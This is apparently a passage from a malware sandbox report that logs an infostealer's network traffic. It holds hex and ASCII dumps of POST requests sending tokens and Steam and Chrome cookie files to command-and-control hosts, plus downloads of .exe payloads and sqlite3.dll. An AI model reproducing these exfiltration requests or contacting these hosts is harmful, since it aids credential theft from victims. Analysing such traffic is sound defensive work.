39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4f 68 4a 66 2f 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="file_data"OhJf/g==------AEBKFIJEGCAAFHJKFCFC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAKEBGDAFHIIDHIIECFHost: urusvisa.comContent-Length: 130481Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="mode"5------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIIEGHDGDBFIDGHDAFHost: urusvisa.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 35 33 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 49 45 47 48 44 47 44 42 46 49 44 47 48 44 41 46 2d 2d 0d 0a Data Ascii: ------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="mode"51------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="task_id"1253402------HIIIIEGHDGDBFIDGHDAFContent-Disposition: form-data; name="status"1------HIIIIEGHDGDBFIDGHDAF--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKKJJJKJKFHJJJJECBHost: urusvisa.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 35 33 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 43 42 2d 2d 0d 0a Data Ascii: ------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="mode"51------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="task_id"1253403------KJKKKJJJKJKFHJJJJECBContent-Disposition: form-data; name="status"1------KJKKKJJJKJKFHJJJJECB--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2ae906657_snd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: urusvisa.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 35 33 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="mode"51------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="task_id"1253404------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="status"1------HDBGHDHCGHCAAKEBKECB--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEGHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 36 61 62 32 30 39 32 30 66 32 31 37 30 63 33 32 38 34 39 32 35 38 32 30 30 61 37 30 66 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 31 34 64 37 37 38 34 39 61 30 31 66 66 38 61 62 37 64 64 39 39 64 35 66 30 61 32 65 31 39 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 41 46 42 46 42 4b 46 48 4a 4a 4b 45 48 49 45 47 2d 2d 0d 0a Data Ascii: ------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="token"06ab20920f2170c32849258200a70f10------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="build_id"514d77849a01ff8ab7dd99d5f0a2e19e------KFIDAFBFBKFHJJKEHIEGContent-Disposition: form-data; name="mode"6------KFIDAFBFBKFHJJKEHIEG--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="hwid"54A50671C48A3788952882------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build"default------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCAHost: cowod.hopto.orgContent-Length: 3181Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDAFIEHIEGDHIDGDGHDHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 2d 2d 0d 0a Data Ascii: ------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------HJDAFIEHIEGDHIDGDGHDContent-Disposition: form-data; name="message"browsers------HJDAFIEHIEGDHIDGDGHD--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="message"plugins------AFIDGDBGCAAFIDHIJKEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 45 47 44 47 49 4a 45 43 47 43 42 47 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------BKJEGDGIJECGCBGCGHDGContent-Disposition: form-data; name="message"fplugins------BKJEGDGIJECGCBGCGHDG--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJEHost: 46.8.231.109Content-Length: 7787Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIEHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 2d 2d 0d 0a Data Ascii: ------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 